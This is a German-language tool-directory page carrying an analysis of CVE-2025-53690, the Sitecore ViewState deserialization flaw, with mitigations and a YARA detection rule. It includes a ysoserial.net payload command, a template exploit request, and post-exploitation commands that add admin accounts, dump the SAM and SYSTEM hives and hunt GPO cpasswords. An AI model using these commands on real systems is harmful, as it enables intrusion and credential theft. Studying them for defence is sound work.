Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-53690-Analysis — Dies sind CVE-2025-53690 Analysedokumente. | Kitploit
Tools/GitHubGitHub/m0d0ri205/cve-2025-53690-analysis
SchwachstellenanalyseExploitationWebanwendungs-ExploitationForensikMalware-AnalysePenetrationstestsLernen & BildungRed TeamingIncident Response
GitHubm0d0ri205/cve-2025-53690-analysis

CVE-2025-53690-Analysis

Dies sind CVE-2025-53690 Analysedokumente.

34vor 1 JahrNoch nicht geprüft
Repository anzeigen

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-53690: Analyse der Sitecore ViewState Deserialization Schwachstelle

Überblick

CVE-2025-53690 ist eine ViewState-Deserialisierungsschwachstelle in der Sitecore-Produktfamilie, die durch die Ausnutzung offengelegter ASP.NET-Machine-Keys eine Remote-Codeausführung ermöglicht – eine kritische Sicherheitslücke.

Basisinformationen

  • CVE-ID: CVE-2025-53690
  • CVSS-Score: 9,0 (Critical)
  • Schwachstellentyp: Deserialisierung nicht vertrauenswürdiger Daten (CWE-502)
  • Entdeckt: September 2025
  • Veröffentlicht: 3. September 2025
  • Tatsächliche Ausnutzung: Seit Dezember 2024 als Zero-Day ausgenutzt

Betroffene Produkte

  • Sitecore Experience Manager (XM) – alle Versionen ≤ 9.0
  • Sitecore Experience Platform (XP) – alle Versionen ≤ 9.0
  • Sitecore Experience Commerce (XC)
  • Sitecore Managed Cloud
  • Active-Directory-Modul ≤ 1.4

Detaillierte Analyse der Schwachstelle

Grundursache

Der Kern dieser Schwachstelle liegt in fehlerhaftem Konfigurationsmanagement:

  1. Beispiel-Machine-Key verwendet: Die in Sitecore-Bereitstellungsanleitungen vor 2017 enthaltenen Beispiel-ASP.NET-Machine-Keys wurden unverändert in Produktionsumgebungen eingesetzt.
  2. Statische Schlüsselwiederverwendung: Derselbe Machine-Key wurde mehrfach in verschiedenen Bereitstellungen verwendet.
  3. ViewState-Integritätsumgehung: Durch den offengelegten Schlüssel kann die ViewState-Integritätsprüfung umgangen werden.

ASP.NET ViewState-Mechanismus

ViewState ist eine Zustandsverwaltungsfunktion von ASP.NET:

  • Speichert den Zustand einer Webseite im versteckten Feld __VIEWSTATE
  • Verwendet den Machine-Key, um Integrität und Vertraulichkeit zu gewährleisten
  • Der Server deserialisiert das ViewState, um den Seitenzustand wiederherzustellen
root@kitploit:~
<!-- Beispiel web.config -->
<system.web>
    <machineKey 
        validationKey="[64-Byte-Schlüssel]"
        decryptionKey="[48-Byte-Schlüssel]"
        validation="HMACSHA256" 
        decryption="AES" />
</system.web>

Angriffsvektoren

1. Identifizierung eines verwundbaren Endpunkts

root@kitploit:~
Target: /sitecore/blocked.aspx
Method: POST
Eigenschaft: Ohne Authentifizierung zugänglich, verwendet ViewState

2. Erstellung einer bösartigen ViewState-Nutzlast

Angreifer nutzen den bekannten Machine-Key und ysoserial.net, um eine bösartige Nutzlast zu erzeugen:

root@kitploit:~
# Beispielverwendung von ysoserial.net
ysoserial.exe -f ViewState -g TypeConfuseDelegate -c "calc.exe" --validationkey="[Schlüssel]" --validationalg="HMACSHA256" --decryptionkey="[Schlüssel]" --decryptionalg="AES"

3. Senden der HTTP-Anfrage

root@kitploit:~
POST /sitecore/blocked.aspx HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

__VIEWSTATE=[bösartige_Nutzlast]&__VIEWSTATEGENERATOR=[Wert]

Analyse realer Angriffsfälle (Mandiant-Bericht)

Angriffslebenszyklus

Phase 1: Ersteinfiltrations

  • Endpunkt: /sitecore/blocked.aspx
  • Methode: ViewState-Deserialisierungsangriff
  • Berechtigung: NETWORK SERVICE (IIS-Workerprozess)
  • Nutzlast: WEEPSTEEL-Aufklärungstool

Phase 2: Aufklärung und Footprinting

root@kitploit:~
# Ausgeführte Befehle
whoami
hostname  
net user
tasklist
ipconfig /all
netstat -ano
net group "domain admins"

Bereitgestellte Tools:

  • 7za.exe: Dateikomprimierungstool
  • lfe.ico: EARTHWORM-Netzwerktunnel-Tool
  • 1.vbs: VBScript zur Befehlsausführung

Phase 3: Privilegienausweitung

root@kitploit:~
# Lokales Administratorkonto erstellen
net user asp$ [Passwort] /add
net localgroup administrators asp$ /add

net user sawadmin [Passwort] /add  
net localgroup administrators sawadmin /add

Sammeln von Anmeldedaten:

root@kitploit:~
reg save HKLM\SYSTEM c:\users\public\system.hive
reg save HKLM\SAM c:\users\public\sam.hive

Phase 4: Persistenz sichern

  • RDP-Zugriff: Verwendung der erstellten Administratorkonten
  • DWAGENT: Installation eines Remotezugriff-Tools (als SYSTEM-Dienst registriert)
  • Änderung der Kontoeinstellungen:
root@kitploit:~
net user [AdminUser] /passwordchg:no /expires:never
wmic useraccount where name='[AdminUser]' set PasswordExpires=False

Phase 5: Interne Aufklärung

root@kitploit:~
# Domain Controller identifizieren
nltest /DCLIST:[domain]
nslookup [domain-controller]

# Suche nach cpassword in GPO (Group Policy Preferences-Angriff)
findstr /S /l cpassword \\[DC]\sysvol\[domain]\policies\*.xml

# BloodHound/SharpHound ausführen
sh.exe -c all

Phase 6: Laterale Bewegung

  • RDP-Zugriff auf andere Systeme mit gestohlenen Domänenadministrator-Konten
  • Umgehung der Sicherheitsmaßnahmen durch Netzwerktunnel mit EARTHWORM

Verwendete Tool-Analyse

WEEPSTEEL (Aufklärungstool)

root@kitploit:~
// Gesammelte Informationen
Information.BasicsInfo basicsInfo = new Information.BasicsInfo
{
    Directories = new Information.Directories
    {
        CurrentWebDirectory = HostingEnvironment.MapPath("~/")
    },
    OperatingSystemInformation = Information.GetOperatingSystemInformation(),
    DiskInformation = Information.GetDiskInformation(),
    NetworkAdapterInformation = Information.GetNetworkAdapterInformation(),
    Process = Information.GetProcessInformation()
};

Ausgabe: Daten werden als ViewState getarnt versteckt

root@kitploit:~
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" 
       value="/wEPDwUKLTcyODc4{AES verschlüsselt + base64-kodierte Ausgabe}" />

EARTHWORM (Netzwerktunnel)

  • SOCKS v5-Proxy-Server-Funktionalität
  • Firewall-Umgehung und Verkehrstarnung
  • Tunnel für RDP-Traffic zur Erkennungsvermeidung

DWAGENT (Remotezugriff)

  • Legitimes Remote-Verwaltungstool
  • Als Dienst mit SYSTEM-Rechten registriert
  • Automatischer Start für Persistenz

SHARPHOUND (AD-Aufklärung)

  • Datensammlungstool für BloodHound
  • Kartierung der Active-Directory-Umgebung
  • Identifizierung von Angriffspfaden

Abwehr- und Minderungsmaßnahmen

Sofortmaßnahmen

root@kitploit:~
<!-- Eindeutigen Machine-Key generieren -->
<machineKey 
    validationKey="[neuer_64-Byte-Schlüssel]"
    decryptionKey="[neuer_48-Byte-Schlüssel]"
    validation="HMACSHA256" 
    decryption="AES" />

Sicherheitsverbesserungen

  1. Automatisierte Schlüsselrotation
  2. Aktivierung der ViewState-MAC-Überprüfung
  3. Verschlüsselung der Konfigurationsdateien
  4. Netzwerksegmentierung
  5. Verbesserte Überwachung

Erkennungsregeln

root@kitploit:~
# YARA-Regelbeispiel (WEEPSTEEL-Erkennung)
rule WEEPSTEEL_Detection {
    strings:
        $viewstate = "__VIEWSTATE"
        $crypto = "System.Security.Cryptography"
        $serializer = "JavaScriptSerializer"
    condition:
        all of them
}

Fazit

CVE-2025-53690 ist ein repräsentatives Beispiel dafür, wie ein einfacher Konfigurationsfehler zu einer schwerwiegenden Sicherheitsbedrohung führen kann. Durch diese Schwachstelle können Lernende den gesamten Lebenszyklus eines echten APT-Angriffs erfahren und moderne Angriffstechniken sowie Verteidigungsstrategien verstehen.

Referenzen

  • Google Cloud Blog - ViewState Deserialization Zero-Day
  • Sitecore Advisory SC2025-005
  • CISA KEV Catalog
  • ysoserial.net
  • Microsoft Security Blog - ASP.NET Machine Keys
Tool herunterladen